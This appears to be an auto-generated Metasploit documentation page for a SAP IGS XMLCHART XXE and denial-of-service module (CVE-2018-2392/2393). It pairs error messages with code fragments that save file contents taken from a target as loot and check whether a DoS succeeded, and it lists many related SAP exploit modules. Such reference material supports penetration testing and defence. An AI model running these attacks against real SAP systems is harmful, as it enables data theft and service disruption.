          vprint_good("File: #{@file} content from host: #{@host}\n#{@file_content}")
Failed to get <FILE> content!
Here is a relevant code snippet related to the "Failed to get <FILE> content!" error message:
        if !@file_content.to_s.empty?
          vprint_good("File: #{@file} content from host: #{@host}\n#{@file_content}")
          loot = store_loot('igs.xmlchart.xxe', 'text/plain', @host, @file_content, @file, 'SAP IGS XMLCHART XXE')
          print_good("File: #{@file} saved in: #{loot}")
        else
          print_error("Failed to get #{@file} content!")
        end

      end
    end
  end
Failed to retrieve SAP IGS page at <SCHEMA><HOST>:<PORT><PATH>
Here is a relevant code snippet related to the "Failed to retrieve SAP IGS page at <SCHEMA><HOST>:<PORT><PATH>" error message:
        port: @port,
        name: name,
        refs: references
      )
    rescue StandardError => e
      print_error("Failed to retrieve SAP IGS page at #{@schema}#{@host}:#{@port}#{@path}")
      vprint_error("Error #{e.class}: #{e}")
    end

    # Check HTTP response
    fail_with(Failure::NotVulnerable, 'The target responded with a 200 OK response code. The DoS attempt was unsuccessful.') unless dos_response.code != 200
Error <E.CLASS>: <E>
Here is a relevant code snippet related to the "Error <E.CLASS>: <E>" error message:
        name: name,
        refs: references
      )
    rescue StandardError => e
      print_error("Failed to retrieve SAP IGS page at #{@schema}#{@host}:#{@port}#{@path}")
      vprint_error("Error #{e.class}: #{e}")
    end

    # Check HTTP response
    fail_with(Failure::NotVulnerable, 'The target responded with a 200 OK response code. The DoS attempt was unsuccessful.') unless dos_response.code != 200
  end
The target responded with a 200 OK response code. The DoS attempt was unsuccessful.
Here is a relevant code snippet related to the "The target responded with a 200 OK response code. The DoS attempt was unsuccessful." error message:
      )
    rescue StandardError => e
      print_error("Failed to retrieve SAP IGS page at #{@schema}#{@host}:#{@port}#{@path}")
      vprint_error("Error #{e.class}: #{e}")
    end

    # Check HTTP response
    fail_with(Failure::NotVulnerable, 'The target responded with a 200 OK response code. The DoS attempt was unsuccessful.') unless dos_response.code != 200
  end

end
Related Pull Requests
- #15192 Merged Pull Request: Enforce Style/RedundantBegin for new modules
- #14806 Merged Pull Request: Rubocop recently landed modules continued
- #14163 Merged Pull Request: SAP Internet Graphics Server (IGS) XMLCHART XXE attack (CVE-2018-2392 and CVE-2018-2393)
References
- CVE-2018-2392
- CVE-2018-2393
- https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_IGS-The-vulnerable-forgotten-component.pdf
See Also
Check also the following modules related to this module:
- auxiliary/admin/sap/cve_2020_6207_solman_rce
- auxiliary/admin/sap/cve_2020_6287_ws_add_user
- auxiliary/admin/sap/sap_configservlet_exec_noauth
- auxiliary/admin/sap/sap_mgmt_con_osexec
- auxiliary/dos/sap/sap_soap_rfc_eps_delete_file
- auxiliary/scanner/sap/sap_ctc_verb_tampering_user_mgmt
- auxiliary/scanner/sap/sap_hostctrl_getcomputersystem
- auxiliary/scanner/sap/sap_icf_public_info
- auxiliary/scanner/sap/sap_icm_urlscan
- auxiliary/scanner/sap/sap_mgmt_con_abaplog
- auxiliary/scanner/sap/sap_mgmt_con_brute_login
- auxiliary/scanner/sap/sap_mgmt_con_extractusers
- auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints
- auxiliary/scanner/sap/sap_mgmt_con_getenv
- auxiliary/scanner/sap/sap_mgmt_con_getlogfiles
- auxiliary/scanner/sap/sap_mgmt_con_getprocesslist
- auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter
- auxiliary/scanner/sap/sap_mgmt_con_instanceproperties
- auxiliary/scanner/sap/sap_mgmt_con_listconfigfiles
- auxiliary/scanner/sap/sap_mgmt_con_listlogfiles
- auxiliary/scanner/sap/sap_mgmt_con_startprofile
- auxiliary/scanner/sap/sap_mgmt_con_version
- auxiliary/scanner/sap/sap_router_info_request
- auxiliary/scanner/sap/sap_router_portscanner
- auxiliary/scanner/sap/sap_service_discovery
- auxiliary/scanner/sap/sap_smb_relay
- auxiliary/scanner/sap/sap_soap_bapi_user_create1
- auxiliary/scanner/sap/sap_soap_rfc_brute_login
- auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec
- auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec
- auxiliary/scanner/sap/sap_soap_rfc_eps_get_directory_listing
- auxiliary/scanner/sap/sap_soap_rfc_pfl_check_os_file_existence
- auxiliary/scanner/sap/sap_soap_rfc_ping
- auxiliary/scanner/sap/sap_soap_rfc_read_table
- auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir
- auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface
- auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec
- auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec
- auxiliary/scanner/sap/sap_soap_rfc_system_info
- auxiliary/scanner/sap/sap_soap_th_saprel_disclosure
- auxiliary/scanner/sap/sap_web_gui_brute_login
- exploit/multi/sap/cve_2020_6207_solman_rs
- exploit/multi/sap/sap_mgmt_con_osexec_payload
- exploit/multi/sap/sap_soap_rfc_sxpg_call_system_exec
- exploit/multi/sap/sap_soap_rfc_sxpg_command_exec
- post/multi/sap/smdagent_get_properties
- auxiliary/admin/http/openbravo_xxe
- auxiliary/gather/drupal_openid_xxe
- auxiliary/gather/emc_cta_xxe
- auxiliary/gather/mcafee_epo_xxe
- auxiliary/gather/opennms_xxe
- auxiliary/admin/http/nexpose_xxe_file_read
- exploit/linux/http/zimbra_xxe_rce
- auxiliary/dos/scada/igss9_dataserver
- exploit/windows/http/sap_configservlet_exec_noauth
- exploit/windows/scada/igss9_igssdataserver_listall
- exploit/windows/scada/igss9_igssdataserver_rename
- exploit/windows/scada/igss9_misc
- exploit/windows/scada/igss_exec_17
- post/linux/gather/enum_configs
- post/windows/gather/credentials/digsby
Authors
- Yvan Genuer
- Vladimir Ivanov
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.